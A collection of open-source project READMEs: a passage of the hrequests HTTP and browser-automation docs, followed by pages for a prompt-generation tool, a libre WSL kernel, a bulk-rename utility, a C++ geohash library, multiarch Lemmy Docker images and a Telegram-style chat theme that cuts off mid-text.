and resp2 are sent concurrently print('Resp 1:', resp1.reason) # will pause for resp1 to finish, if it hasn't already print('Resp 2:', resp2.reason) # will pause for resp2 to finish, if it hasn't already ``` This is useful for sending multiple requests concurrently, but only waiting for the response when it is needed. Note that `no_pause` uses gevent as it's backend. Use `no_pause_threadsafe` when running across multiple threads. ### Grequests-style Async Requests The method `async_get` will create an unsent request. <details> <summary>Parameters</summary> ``` Parameters: url (str): URL to send request to data (Union[str, bytes, bytearray, dict], optional): Data to send to request. Defaults to None. files (Dict[str, Union[BufferedReader, tuple]], optional): Data to send to request. Defaults to None. headers (dict, optional): Dictionary of HTTP headers to send with the request. Defaults to None. params (dict, optional): Dictionary of URL parameters to append to the URL. Defaults to None. cookies (Union[RequestsCookieJar, dict, list], optional): Dict or CookieJar to send. Defaults to None. json (dict, optional): Json to send in the request body. Defaults to None. allow_redirects (bool, optional): Allow request to redirect. Defaults to True. history (bool, optional): Remember request history. Defaults to False. verify (bool, optional): Verify the server's TLS certificate. Defaults to True. timeout (int, optional): Timeout in seconds. Defaults to 30. proxies (dict, optional): Dictionary of proxies. Defaults to None. no_pause (bool, optional): Run the request in the background. Defaults to False. <Additionally includes all parameters from `hrequests.Session` if a session was not specified> Returns: hrequests.response.Response: Response object ``` </details> Async requests are evaluated on `hrequests.map`, `hrequests.imap`, or `hrequests.imap_enum`. This functionality is similar to [grequests](https://github.com/spyoungtech/grequests). Unlike grequests, [monkey patching](https://www.gevent.org/api/gevent.monkey.html) is not required because this does not rely on the standard python SSL library. Create a set of unsent Requests: ```py reqs = [ hrequests.async_get('https://www.google.com/'), hrequests.async_get('https://www.duckduckgo.com/'), hrequests.async_get('https://www.yahoo.com/') ] ``` #### map Send them all at the same time using map: ```py >>> hrequests.map(reqs, size=3) [<Response [200]>, <Response [200]>, <Response [200]>] ``` <details> <summary>Parameters</summary> ``` Concurrently converts a list of Requests to Responses. Parameters: requests - a collection of Request objects. size - Specifies the number of requests to make at a time. If None, no throttling occurs. exception_handler - Callback function, called when exception occured. Params: Request, Exception timeout - Gevent joinall timeout in seconds. (Note: unrelated to requests timeout) Returns: A list of Response objects. ``` </details> #### imap `imap` returns a generator that yields responses as they come in: ```py >>> for resp in hrequests.imap(reqs, size=3): ... print(resp) <Response [200]> <Response [200]> <Response [200]> ``` <details> <summary>Parameters</summary> ``` Concurrently converts a generator object of Requests to a generator of Responses. Parameters: requests - a generator or sequence of Request objects. size - Specifies the number of requests to make at a time. default is 2 exception_handler - Callback function, called when exception occurred. Params: Request, Exception Yields: Response objects. ``` </details> `imap_enum` returns a generator that yields a tuple of `(index, response)` as they come in. The `index` is the index of the request in the original list: ```py >>> for index, resp in hrequests.imap_enum(reqs, size=3): ... print(index, resp) (1, <Response [200]>) (0, <Response [200]>) (2, <Response [200]>) ``` <details> <summary>Parameters</summary> ``` Like imap, but yields tuple of original request index and response object Unlike imap, failed results and responses from exception handlers that return None are not ignored. Instead, a tuple of (index, None) is yielded. Responses are still in arbitrary order. Parameters: requests - a sequence of Request objects. size - Specifies the number of requests to make at a time. default is 2 exception_handler - Callback function, called when exception occurred. Params: Request, Exception Yields: (index, Response) tuples. ``` </details> #### Exception Handling To handle timeouts or any other exception during the connection of the request, you can add an optional exception handler that will be called with the request and exception inside the main thread. ```py >>> def exception_handler(request, exception): ... return f'Response failed: {exception}' >>> bad_reqs = [ ... hrequests.async_get('http://httpbin.org/delay/5', timeout=1), ... hrequests.async_get('http://fakedomain/'), ... hrequests.async_get('http://example.com/'), ... ] >>> hrequests.map(bad_reqs, size=3, exception_handler=exception_handler) ['Response failed: Connection error', 'Response failed: Connection error', <Response [200]>] ``` The value returned by the exception handler will be used in place of the response in the result list: <hr width=50> ## HTML Parsing HTML scraping uses PyQuery, which is ~7x faster than bs4. This functionality is based of [requests-html](https://github.com/psf/requests-html). | Library | Time (1e5 trials) | | --- | --- | | BeautifulSoup4 | 52.6 | | PyQuery | 7.5 | The HTML parser can be accessed through the `html` attribute of the response object: ```py >>> resp = session.get('https://python.org/') >>> resp.html <HTML url='https://www.python.org/'> ``` ### Parsing page Grab a list of all links on the page, as-is (anchors excluded): ```py >>> resp.html.links {'//docs.python.org/3/tutorial/', '/about/apps/', 'https://github.com/python/pythondotorg/issues', '/accounts/login/', '/dev/peps/', '/about/legal/',... ``` Grab a list of all links on the page, in absolute form (anchors excluded): ```py >>> resp.html.absolute_links {'https://github.com/python/pythondotorg/issues', 'https://docs.python.org/3/tutorial/', 'https://www.python.org/about/success/', 'http://feedproxy.g... ``` Search for text on the page: ```py >>> resp.html.search('Python is a {} language')[0] programming ``` ### Selecting elements Select an element using a CSS Selector: ```py >>> about = resp.html.find('#about') ``` <details> <summary>Parameters</summary> ``` Given a CSS Selector, returns a list of :class:`Element <Element>` objects or a single one. Parameters: selector: CSS Selector to use. clean: Whether or not to sanitize the found HTML of ``<script>`` and ``<style>`` containing: If specified, only return elements that contain the provided text. first: Whether or not to return just the first result. _encoding: The encoding format. Returns: A list of :class:`Element <Element>` objects or a single one. Example CSS Selectors: - ``a`` - ``a.someClass`` - ``a#someID`` - ``a[target=_blank]`` See W3School's `CSS Selectors Reference <https://www.w3schools.com/cssref/css_selectors.asp>`_ for more details. If ``first`` is ``True``, only returns the first :class:`Element <Element>` found. ``` </details> XPath is also supported: ```py >>> resp.html.xpath('/html/body/div[1]/a') [<Element 'a' class=('px-2', 'py-4', 'show-on-focus', 'js-skip-to-content') href='#start-of-content' tabindex='1'>] ``` <details> <summary>Parameters</summary> ``` Given an XPath selector, returns a list of Element objects or a single one. Parameters: selector (str): XPath Selector to use. clean (bool, optional): Whether or not to sanitize the found HTML of <script> and <style> tags. Defaults to first (bool, optional): Whether or not to return just the first result. Defaults to False. _encoding (str, optional): The encoding format. Defaults to None. Returns: _XPath: A list of Element objects or a single one. If a sub-selector is specified (e.g. //a/@href), a simple list of results is returned. See W3School's XPath Examples for more details. If first is True, only returns the first Element found. ``` </details> ### Introspecting elements Grab an Element's text contents: ```py >>> print(about.text) About Applications Quotes Getting Started Help Python Brochure ``` Getting an Element's attributes: ```py >>> about.attrs {'id': 'about', 'class': ('tier-1', 'element-1'), 'aria-haspopup': 'true'} ``` Get an Element's raw HTML: ```py >>> about.html '<li aria-haspopup="true" class="tier-1 element-1 " id="about">\n<a class="" href="/about/" title="">About</a>\n<ul aria-hidden="true" class="subnav menu" role="menu">\n<li class="tier-2 element-1" role="treeitem"><a href="/about/apps/" title="">Applications</a></li>\n<li class="tier-2 element-2" role="treeitem"><a href="/about/quotes/" title="">Quotes</a></li>\n<li class="tier-2 element-3" role="treeitem"><a href="/about/gettingstarted/" title="">Getting Started</a></li>\n<li class="tier-2 element-4" role="treeitem"><a href="/about/help/" title="">Help</a></li>\n<li class="tier-2 element-5" role="treeitem"><a href="http://brochure.getpython.info/" title="">Python Brochure</a></li>\n</ul>\n</li>' ``` Select Elements within Elements: ```py >>> about.find_all('a') [<Element 'a' href='/about/' title='' class=''>, <Element 'a' href='/about/apps/' title=''>, <Element 'a' href='/about/quotes/' title=''>, <Element 'a' href='/about/gettingstarted/' title=''>, <Element 'a' href='/about/help/' title=''>, <Element 'a' href='http://brochure.getpython.info/' title=''>] >>> about.find('a') <Element 'a' href='/about/' title='' class=''> ``` Search for links within an element: ```py >>> about.absolute_links {'http://brochure.getpython.info/', 'https://www.python.org/about/gettingstarted/', 'https://www.python.org/about/', 'https://www.python.org/about/quotes/', 'https://www.python.org/about/help/', 'https://www.python.org/about/apps/'} ``` <hr width=50> ## Browser Automation You can spawn a `BrowserSession` instance by calling it: ```py >>> page = hrequests.BrowserSession() # headless=True by default ``` <details> <summary>Parameters</summary> ``` Parameters: headless (bool, optional): Whether to run the browser in headless mode. Defaults to True. session (hrequests.session.TLSSession, optional): Session to use for headers, cookies, etc. resp (hrequests.response.Response, optional): Response to update with cookies, headers, etc. proxy_ip (str, optional): Proxy to use for the browser. Example: 123.123.123 mock_human (bool, optional): Whether to emulate human behavior. Defaults to False. browser (Literal['firefox', 'chrome', 'opera'], optional): Generate useragent headers for a specific browser os (Literal['win', 'mac', 'lin'], optional): Generate headers for a specific OS extensions (Union[str, Iterable[str]], optional): Path to a folder of unpacked extensions, or a list of paths to unpacked extensions ``` </details> `BrowserSession` is entirely safe to use across threads. ### Render an existing Response Responses have a `.render()` method. This will render the contents of the response in a browser page. Once the page is closed, the Response content and the Response's session cookies will be updated. **Example - submitting a login form:** ```py >>> resp = session.get('https://www.somewebsite.com/') >>> with resp.render(mock_human=True) as page: ... page.type('.input#username', 'myuser') ... page.type('.input#password', 'p4ssw0rd') ... page.click('#submit') # `session` & `resp` now have updated cookies, content, etc. ``` <details> <summary><strong>Or, without a context manager</strong></summary> ```py >>> resp = session.get('https://www.somewebsite.com/') >>> page = resp.render(mock_human=True) >>> page.type('.input#username', 'myuser') >>> page.type('.input#password', 'p4ssw0rd') >>> page.click('#submit') >>> page.close() # must close the page when done! ``` </details> The `mock_human` parameter will emulate human-like behavior. This includes easing and randomizing mouse movements, and randomizing typing speed. This functionality is based on [botright](https://github.com/Vinyzu/botright/). <details> <summary>Parameters</summary> ``` Parameters: headless (bool, optional): Whether to run the browser in headless mode. Defaults to False. mock_human (bool, optional): Whether to emulate human behavior. Defaults to False. extensions (Union[str, Iterable[str]], optional): Path to a folder of unpacked extensions, or a list of paths to unpacked extensions ``` </details> ### Properties Cookies are inherited from the session: ```py >>> page.cookies: RequestsCookieJar # cookies are inherited from the session <RequestsCookieJar[Cookie(version=0, name='1P_JAR', value='2023-07-05-20', port=None, port_specified=False, domain='.somewebsite.com', domain_specified=True... ``` ### Pulling page data Get current page url: ```py >>> page.url: str https://www.somewebsite.com/ ``` Get page content: ```py >>> page.text: str '<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world\'s information, including webpag' >>> page.content: bytes b'<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world\'s information, including webpag' ``` Parsing HTML from the page content: ```py >>> page.html.find_all('a') [<Element 'a' href='/about/' title='' class=''>, <Element 'a' href='/about/apps/' title=''>, ...] >>> page.html.find('a') <Element 'a' href='/about/' title='' class=''>, <Element 'a' href='/about/apps/' title=''> ``` Take a screenshot of the page: ```py page.screenshot('screenshot.png') ``` <details> <summary>Parameters</summary> ``` Parameters: path (str): Path to save screenshot to full_page (bool): Whether to take a screenshot of the full scrollable page ``` </details> ### Navigate the browser Navigate to a url: ```py >>> page.url = 'https://bing.com' # or use goto >>> page.goto('https://bing.com') ``` Navigate through page history: ```py >>> page.back() >>> page.forward() ``` ### Controlling elements Click an element: ```py >>> page.click('#my-button') # or through the html parser >>> page.html.find('#my-button').click() ``` <details> <summary>Parameters</summary> ``` Parameters: selector (str): CSS selector to click. button (Literal['left', 'right', 'middle'], optional): Mouse button to click. Defaults to 'left'. count (int, optional): Number of clicks. Defaults to 1. timeout (float, optional): Timeout in seconds. Defaults to 30. wait_after (bool, optional): Wait for a page event before continuing. Defaults to True. ``` </details> Hover over an element: ```py >>> page.hover('.dropbtn') # or through the html parser >>> page.html.find('.dropbtn').hover() ``` <details> <summary>Parameters</summary> ``` Parameters: selector (str): CSS selector to hover over modifiers (List[Literal['Alt', 'Control', 'Meta', 'Shift']], optional): Modifier keys to press. Defaults to None. timeout (float, optional): Timeout in seconds. Defaults to 90. ``` </details> Type text into an element: ```py >>> page.type('#my-input', 'Hello world!') # or through the html parser >>> page.html.find('#my-input').type('Hello world!') ``` <details> <summary>Parameters</summary> ``` Parameters: selector (str): CSS selector to type in text (str): Text to type delay (int, optional): Delay between keypresses in ms. On mock_human, this is randomized by 50%. Defaults to 50. timeout (float, optional): Timeout in seconds. Defaults to 30. ``` </details> Drag and drop an element: ```py >>> page.dragTo('#source-selector', '#target-selector') # or through the html parser >>> page.html.find('#source-selector').dragTo('#target-selector') ``` <details> <summary>Parameters</summary> ``` Parameters: source (str): Source to drag from target (str): Target to drop to timeout (float, optional): Timeout in seconds. Defaults to 30. wait_after (bool, optional): Wait for a page event before continuing. Defaults to False. check (bool, optional): Check if an element is draggable before running. Defaults to False. Throws: hrequests.exceptions.BrowserTimeoutException: If timeout is reached ``` </details> ### Check page elements Check if a selector is visible and enabled: ```py >>> page.isVisible('#my-selector'): bool >>> page.isEnabled('#my-selector'): bool ``` <details> <summary>Parameters</summary> ``` Parameters: selector (str): Selector to check ``` </details> Evaluate and return a script: ```py >>> page.evaluate('selector => document.querySelector(selector).checked', '#my-selector') ``` <details> <summary>Parameters</summary> ``` Parameters: script (str): Javascript to evaluate in the page arg (str, optional): Argument to pass into the javascript function ``` </details> ### Awaiting events ```py >>> page.awaitNavigation() ``` <details> <summary>Parameters</summary> ``` Parameters: timeout (float, optional): Timeout in seconds. Defaults to 30. Throws: hrequests.exceptions.BrowserTimeoutException: If timeout is reached ``` </details> Wait for a script or function to return a truthy value: ```py >>> page.awaitScript('selector => document.querySelector(selector).value === 100', '#progress') ``` <details> <summary>Parameters</summary> ``` Parameters: script (str): Script to evaluate arg (str, optional): Argument to pass to script timeout (float, optional): Timeout in seconds. Defaults to 30. Throws: hrequests.exceptions.BrowserTimeoutException: If timeout is reached ``` </details> Wait for the URL to match: ```py >>> page.awaitUrl(re.compile(r'https?://www\.google\.com/.*'), timeout=10) ``` <details> <summary>Parameters</summary> ``` Parameters: url (Union[str, Pattern[str], Callable[[str], bool]]) - URL to match for timeout (float, optional): Timeout in seconds. Defaults to 30. Throws: hrequests.exceptions.BrowserTimeoutException: If timeout is reached ``` </details> Wait for an element to exist on the page: ```py >>> page.awaitSelector('#my-selector') ``` <details> <summary>Parameters</summary> ``` Parameters: selector (str): Selector to wait for timeout (float, optional): Timeout in seconds. Defaults to 30. Throws: hrequests.exceptions.BrowserTimeoutException: If timeout is reached ``` </details> Wait for an element to be enabled: ```py >>> page.awaitEnabled('#my-selector') ``` <details> <summary>Parameters</summary> ``` Parameters: selector (str): Selector to wait for timeout (float, optional): Timeout in seconds. Defaults to 30. Throws: hrequests.exceptions.BrowserTimeoutException: If timeout is reached ``` </details> ### Adding Chrome extensions Chrome extensions can be easily imported into a browser session. Some potentially useful extensions include: - [hektCaptcha](https://github.com/Wikidepia/hektCaptcha-extension) - Hcaptcha solver - [uBlock Origin](https://github.com/gorhill/uBlock) - Ad & popup blocker - [FastForward](https://fastforward.team/) - Bypass & skip link redirects Extensions are added with the `extensions` parameter. - This can be an list of absolute paths to unpacked extensions: ```py with resp.render(extensions=['C:\\extentions\\hektcaptcha', 'C:\\extentions\\ublockorigin']): ``` - Or a folder containing the unpacked extensions: ```py with resp.render(extensions='C:\\extentions'): ``` Note that these need to be *unpacked* extensions. You can unpack a `.crx` file by changing the file extension to `.zip` and extracting the contents. Here is an usage example of using a captcha solver: ```py >>> with hrequests.render('https://accounts.hcaptcha.com/demo', extensions=['C:\\extentions\\hektcaptcha']) as page: ... page.awaitSelector('.hcaptcha-success') # wait for captcha to finish ... page.click('input[type=submit]') ``` ### Requests & Responses Requests can also be sent within browser sessions. These operate the same as the standard `hrequests.request`, and will use the browser's cookies and headers. The `BrowserSession` cookies will be updated with each request. This returns a normal `Response` object: ```py >>> resp = page.get('https://duckduckgo.com') ``` <details> <summary>Parameters</summary> ``` Parameters: url (str): URL to send request to params (dict, optional): Dictionary of URL parameters to append to the URL. Defaults to None. data (Union[str, dict], optional): Data to send to request. Defaults to None. headers (dict, optional): Dictionary of HTTP headers to send with the request. Defaults to None. form (dict, optional): Form data to send with the request. Defaults to None. multipart (dict, optional): Multipart data to send with the request. Defaults to None. timeout (float, optional): Timeout in seconds. Defaults to 30. verify (bool, optional): Verify the server's TLS certificate. Defaults to True. max_redirects (int, optional): Maximum number of redirects to follow. Defaults to None. Throws: hrequests.exceptions.BrowserTimeoutException: If timeout is reached Returns: hrequests.response.Response: Response object ``` </details> Other methods include `post`, `put`, `delete`, `head`, and `patch`. ### Closing the page The `BrowserSession` object must be closed when finished. This will close the browser, update the response data, and merge new cookies with the session cookies. ```py >>> page.close() ``` Note that this is automatically done when using a context manager. Session cookies are updated: ```py >>> session.cookies: RequestsCookieJar <RequestsCookieJar[Cookie(version=0, name='MUID', value='123456789', port=None, port_specified=False, domain='.bing.com', domain_specified=True, domain_initial_dot=True... ``` Response data is updated: ```py >>> resp.url: str 'https://www.bing.com/?toWww=1&redig=823778234657823652376438' >>> resp.content: Union[bytes, str] '<!DOCTYPE html><html lang="en" dir="ltr"><head><meta name="theme-color" content="#4F4F4F"><meta name="description" content="Bing helps you turn inform... ``` #### Other ways to create a Browser Session You can use `.render` to spawn a `BrowserSession` object directly from a url: ```py # Using a Session: >>> page = session.render('https://google.com') # Or without a session at all: >>> page = hrequests.render('https://google.com') ``` Make sure to close all `BrowserSession` objects when done! ```py >>> page.close() ``` ---
pikho/ppromptor
https://github.com/pikho/ppromptor
Prompt-Promptor is a python library for automatically generating prompts using LLMs
# Prompt-Promptor: An Autonomous Agent Framework for Prompt Engineering Prompt-Promptor(or shorten for ppromptor) is a Python library designed to automatically generate and improve prompts for LLMs. It draws inspiration from autonomous agents like AutoGPT and consists of three agents: Proposer, Evaluator, and Analyzer. These agents work together with human experts to continuously improve the generated prompts. ## 🚀 Features: - 🤖 The use of LLMs to prompt themself by giving few samples. - 💪 Guidance for OSS LLMs(eg, LLaMA) by more powerful LLMs(eg, GPT4) - 📈 Continuously improvement. - 👨‍👨‍👧‍👦 Collaboration with human experts. - 💼 Experiment management for prompt engineering. - 🖼 Web GUI interface. - 🏳️‍🌈 Open Source. ## Warning - This project is currently in its earily stage, and it is anticipated that there will be major design changes in the future. - The main function utilizes an infinite loop to enhance the generation of prompts. If you opt for OpenAI's ChatGPT as Target/Analysis LLMs, kindly ensure that you set a usage limit. ## Concept ![Compare Prompts](https://github.com/pikho/ppromptor/blob/main/doc/images/concept.png?raw=true) A more detailed class diagram could be found in [doc](https://github.com/pikho/ppromptor/tree/main/doc) ## Installations ### From Github 1. Install Package ``` pip install ppromptor --upgrade ``` 2. Clone Repository from Github ``` git clone https://github.com/pikho/ppromptor.git ``` 3. Start Web UI ``` cd ppromptor streamlit run ui/app.py ``` ### Running Local Model(WizardLM) 1. Install Required Packages ``` pip install requirements_local_model.txt ``` 2. Test if WizardLM can run correctly ``` cd <path_to_ppromptor>/ppromptor/llms python wizardlm.py ``` ## Usage 1. Start the Web App ``` cd <path_to_ppromptor> streamlit run ui/app.py ``` 2. Load the Demo Project Load `examples/antonyms.db`(default) for demo purposes. This demonstrates how to use ChatGPT to guide WizardLM to generate antonyms for given inputs. 3. Configuration In the Configuration tab, set `Target LLM` as `wizardlm` if you can infer this model locally. Or choose both `Target LLM` and `Analysis LLM` as `chatgpt`. If chatgpt is used, please provide the OpenAI API Key. 4. Load the dataset The demo project has already loaded 5 records. You can add your own dataset.(Optional) 5. Start the Workload Press the `Start` button to activate the workflow. 5. Prompt Candidates Generated prompts can be found in the `Prompt Candidates` tab. Users can modify generated prompts by selecting only 1 Candidate, then modifying the prompt, then `Create Prompt`. This new prompt will be evaluated by Evaluator agent and then keep improving by Analyzer agent. By selecting 2 prompts, we can compare these prompts side by side. ![Compare Prompts](https://github.com/pikho/ppromptor/blob/main/doc/images/cmp_candidates-1.png?raw=true) ![Compare Prompts](https://github.com/pikho/ppromptor/blob/main/doc/images/cmp_candidates-2.png?raw=true) ## Contribution We welcome all kinds of contributions, including new feature requests, bug fixes, new feature implementation, examples, and documentation updates. If you have a specific request, please use the "Issues" section. For other contributions, simply create a pull request (PR). Your participation is highly valued in improving our project. Thank you!
zhenruyan/WSL-libre-linux-kernel
https://github.com/zhenruyan/WSL-libre-linux-kernel
Installing a 100% libre(free) linux kernel for wsl,It is possible to celebrate freedom within a cell. 给WSL替换自由内核!!!
![无标题](https://github.com/zhenruyan/WSL-libre-linux-kernel/assets/9253251/64554eeb-1075-43b6-aba4-f1eb412d1143) # WSL replace libre linux kernel 100% libre!! [ENGLISH](https://github.com/zhenruyan/WSL-libre-linux-kernel/blob/master/README.md)/[简体中文](https://github.com/zhenruyan/WSL-libre-linux-kernel/blob/master/README_CN.md) [![General build kernel](https://github.com/zhenruyan/WSL-libre-linux-kernel/actions/workflows/blank.yml/badge.svg)](https://github.com/zhenruyan/WSL-libre-linux-kerne/actions/workflows/blank.yml) [![Coverage Status](https://coveralls.io/repos/github/zhenruyan/WSL-libre-linux-kernel/badge.svg?branch=master)](https://coveralls.io/github/zhenruyan/WSL-libre-linux-kernel?branch=master) [![TODOs](https://badgen.net/https/api.tickgit.com/badgen/github.com/zhenruyan/WSL-libre-linux-kernel)](https://www.tickgit.com/browse?repo=github.com/zhenruyan/WSL-libre-linux-kernel) IRC: `#WSL-libre-linux-kernel` on [Libera Chat](https://libera.chat), https://web.libera.chat/#WSL-libre-linux-kernel ## You can also enjoy in windows, completely 100% free kernel * Optimization Async io * Optimization Scheduler * Optimize memory footprint * Enhanced for real-time applications * Modules such as ntfs. * Modules such as exfat. * Modules such as f2fs. * Modules such as btrfs. * kvm are enabled by default. * Better support for ssd and other devices. ## todo - [x] Automatic synchronization of source codes - [ ] Automatic compilation based on tag - [ ] installation script - [ ] Published to scoop winget chocolatey and other windows package management platforms. ![logo](https://www.fsfla.org/ikiwiki/selibre/linux-libre/100gnu+freedo.png) [install kernel](https://github.com/zhenruyan/WSL-libre-linux-kernel/wiki/install-kernel) [build kernel](https://github.com/zhenruyan/WSL-libre-linux-kernel/wiki/config-and-build-kernel) [microsoft wsl2 documents](https://learn.microsoft.com/zh-cn/windows/wsl/wsl-config) Exciting and delightful GNU Linux-libre, Free as in Freedo ![librelinux](https://www.fsfla.org/ikiwiki/selibre/linux-libre/stux.jpg) > The freedom to run the program as you wish, for any purpose (freedom 0). > The freedom to study how the program works, and change it so it does your computing as you wish (freedom 1). Access to the source code is a precondition for this. > The freedom to redistribute copies so you can help others (freedom 2). > The freedom to distribute copies of your modified versions to others (freedom 3). By doing this you can give the whole community a chance to benefit from your changes. Access to the source code is a precondition for this. ![image](https://github.com/zhenruyan/WSL-libre-linux-kernel/assets/9253251/f7f8de26-7761-453f-90de-f6f44b9d7c63) ## All binaries were compiled using an E5 2689 engraved with a logo celebrating the 40th anniversary of GNU. Full of libre faith! ![image](https://github.com/zhenruyan/WSL-libre-linux-kernel/assets/9253251/7de8fa88-8e5a-4f26-9a14-1df6126552d2) ## Celebrate GNU's 40th anniversary with us, we hope to have 40 release announcements, discussions or presentations in one day! https://www.gnu.org/gnu40/ ![https://www.gnu.org/gnu40/](https://www.gnu.org/gnu40/GNU40_HM_banner.png) # thinks * [https://gnu.org](https://gnu.org) * [https://github.com/microsoft/WSL2-Linux-Kernel](https://github.com/microsoft/WSL2-Linux-Kernel) * [https://www.fsfla.org/ikiwiki/selibre/linux-libre/](https://www.fsfla.org/ikiwiki/selibre/linux-libre/)
terror/edmv
https://github.com/terror/edmv
Bulk rename files with your favourite editor
## edmv 📦 [![CI](https://github.com/terror/edmv/actions/workflows/ci.yml/badge.svg)](https://github.com/terror/edmv/actions/workflows/ci.yml) [![crates.io](https://shields.io/crates/v/edmv.svg)](https://crates.io/crates/edmv) **edmv** is a tool that lets you bulk rename files fast using your preferred text editor. ### Demo Below is a short demo showcasing the main functionality of the program: [![asciicast](https://asciinema.org/a/33OVZX9m1PZcyqYvdqmtvBRRv.svg)](https://asciinema.org/a/33OVZX9m1PZcyqYvdqmtvBRRv) ### Installation You can install the **edmv** command-line utility via the rust package manager [cargo](https://doc.rust-lang.org/cargo/): ```bash cargo install edmv ``` ...or you can build it from source: ```bash git clone https://github.com/terror/edmv cd edmv cargo install --path . ``` ...or you can download one of the pre-built binaries from the [releases](https://github.com/terror/edmv/releases) page. ### Usage Below is the output of `edmv --help`: ``` Bulk rename files using your favorite editor Usage: edmv [OPTIONS] [sources]... Arguments: [sources]... Paths to edit Options: --editor <EDITOR> Editor command to use --force Overwrite existing files --resolve Resolve conflicting renames --dry-run Run without making any changes -h, --help Print help -V, --version Print version ``` An option of note is the `--resolve` option, this applies to sources an intermediate rename to either a temporary directory or file - automatically handling conflicts such as overlapping or circular renames. ### Prior Art **edmv** is a tested and extended re-implementation of the version [Casey](https://github.com/casey) wrote in [Python](https://github.com/casey/edmv), do check it out!
nmmmnu/geohash
https://github.com/nmmmnu/geohash
geohash implementation in C++
GEOHASH - implementation in C++ =============================== --- ### What is geohash? Geohash is a algorithm for encoding two dimentional coordinates into a hash. - [wikipedia]. - [Movable Type Scripts] ### This release - Modern C++17 - Fast, no allocations - Neigbour cell optimization [wikipedia]: https://en.wikipedia.org/wiki/Geohash [Movable Type Scripts]: https://www.movable-type.co.uk/scripts/geohash.html
ubergeek77/lemmy-docker-multiarch
https://github.com/ubergeek77/lemmy-docker-multiarch
A build repository for multiarch Docker images for Lemmy
# lemmy-docker-multiarch [![Build Multiarch Images](https://github.com/ubergeek77/lemmy-docker-multiarch/actions/workflows/build-multiarch.yml/badge.svg?branch=main)](https://github.com/ubergeek77/lemmy-docker-multiarch/actions/workflows/build-multiarch.yml) A build repository for multiarch Docker images for Lemmy. Builds [`LemmyNet/lemmy`](https://github.com/LemmyNet/lemmy/) and [`LemmyNet/lemmy-ui`](https://github.com/LemmyNet/lemmy-ui/) for: - x64 (`amd64`) - ARM (`arm/v7`) - ARM64 (`arm64`) I made these because the Lemmy project does not currently support ARM, [and has been deliberating how to create ARM builds since `0.17.4`](https://github.com/LemmyNet/lemmy/issues/3102). The Dockerfiles I use, and the workflow I use to compile these images, are all open source here. [You can see the logs of previous runs on the Actions tab](https://github.com/ubergeek77/lemmy-docker-multiarch/actions/workflows/build-multiarch.yml). When [`LemmyNet/lemmy`](https://github.com/LemmyNet/lemmy/) or [`LemmyNet/lemmy-ui`](https://github.com/LemmyNet/lemmy-ui/) have new tags, my workflow will automatically be launched and those new tags will be built. These images are primarily here so they can be used in my [Lemmy-Easy-Deploy](https://github.com/ubergeek77/Lemmy-Easy-Deploy) project. However, you may use these images manually if you like. They are drop-in replacements for the official Lemmy images. I don't tag `latest`, so you will need to specify a tag to pull. For example, to use `0.18.0`: ``` ghcr.io/ubergeek77/lemmy:0.18.0 ghcr.io/ubergeek77/lemmy-ui:0.18.0 ``` I also build `rc` tags. In general, I will have images for any stable or `rc` tag of the official Lemmy repositories. To see the full list of tags I've built, check the Packages section on this repo, or go to the images directly: - https://github.com/ubergeek77/lemmy-docker-multiarch/pkgs/container/lemmy - https://github.com/ubergeek77/lemmy-docker-multiarch/pkgs/container/lemmy-ui
wibus-wee/icalingua-theme-telegram
https://github.com/wibus-wee/icalingua-theme-telegram
A Telegram-like theme based on icalingua++
<div> <a href="https://github.com/wibus-wee/icalingua-theme-telegram"> <img align="right" width="200" src="https://github.com/wibus-wee/icalingua-theme-telegram/assets/62133302/563396b0-9211-409a-9136-74a6f3cad037#gh-light-mode-only" /> </a> <a href="https://github.com/wibus-wee/icalingua-theme-telegram"> <img align="right" width="200" src="https://github.com/wibus-wee/icalingua-theme-telegram/assets/62133302/115cdb16-88fa-4ba6-9a14-32b9ab669b1b#gh-dark-mode-only" /> </a> </div> # Telegram Theme For Icalingua++ 一个基于 [Icalingua++](https://github.com/Icalingua-plus-plus/Icalingua-plus-plus) 的 Telegram 风格主题。 ## Motivation | 动机 我非常喜欢 Telegram Desktop 的 UI,但是在很多时候我都没法访问 Telegram,并且地区使用习惯的原因,我很难使用 Telegram,而是使用 QQ。 但是 Tencent QQ NT 版本的 UI 完全没有办法自由定制,即使定制成功了也是 HACK 进去的,对这款软件来说它并不合法。所以我决定使用 Icalingua++ 来实现这个主题。它完全可以实现 Telegram 的 UI,而且它是开源的,可以让更多的人使用。 > 总结:**QQ NT 一坨屎,Icalingua++ 大大滴好!** 但其实这个主题与其名曰主题,不如说是一个增强版的 Icalingua++,因为它不仅仅是一个主题,它还会增强 Icalingua++ 的功能与体验。 ## Attentions | 注意事项 - 由于 Icalingua++ 的限制,我改变了消息列表的 DOM 结构,所以我暂时无法实现点击图片放大的功能。后续可能我会尝试重写灯箱来实现这个功能。[Issue #16](https://github.com/wibus-wee/icalingua-theme-telegram/issues/16) - 它**强制改变**了很多原本的**DOM结构**,这可能会导致一些功能出现问题,如果你发现了这些问题,欢迎提交 [Issue](https://github.com/wibus-wee/icalingua-theme-telegram/issues)。 - 由于我们想要增强聊天功能,我们可能需要另外启动一个子进程来处理一些信息。如果你**不信任我 / 不信任仓库代码**,你可以不使用这个主题。 - 在 [#32](https://github.com/wibus-wee/icalingua-theme-telegram/pull/32) 中,我实现了手动控制功能启动功能,你现在可以在 `config.js` 中设置你想要启动的功能了,你也可以将 `manual` 设置为 `false` 来启动所有功能。有关更多配置信息,请参阅 [Config | 配置](#config--配置)。 ## Features | 特性 - **基础样式。** 将 Telegram 的大部分样式移植到 Icalingua++。 - **深度修改。** 将同一联系人的多条消息合并为一条,以减少界面占用。 - **更好的图片信息显示效果。** 以更好的方式显示图片信息。 - **新图标。** 用 Telegram 风格的图标替换图标。 - **漂亮的模态框。** 更改模态框的样式,使其更加美观。 - **不同的用户名颜色。** 为每个用户名分配不同的颜色,以便更好地区分不同的联系人。 - **良好的动效。** 为 Icalingua++ 移除与主题不和谐的动效以及添加更多合理的动效。 - **更多样式。** 将添加更多样式,使 Icalingua++ 更像 Telegram。 - **更好的开发体验。** 自动重载样式和页面,以便开发者更好地开发主题。 ## Installation | 安装 ### Automatic | 自动安装 1. 下载最新的发布版本或从 [CI Release](https://github.com/wibus-wee/icalingua-theme-telegram/releases) 下载最新的构建版本。 2. 给予执行权限 `chmod +x install.sh` 3. 在解压缩包后的目录下运行 `./install.sh`。 4. 重启 Icalingua++。 ### Manual | 手动安装 #### 从 CI 下载 1. 下载最新的发布版本或从 [CI 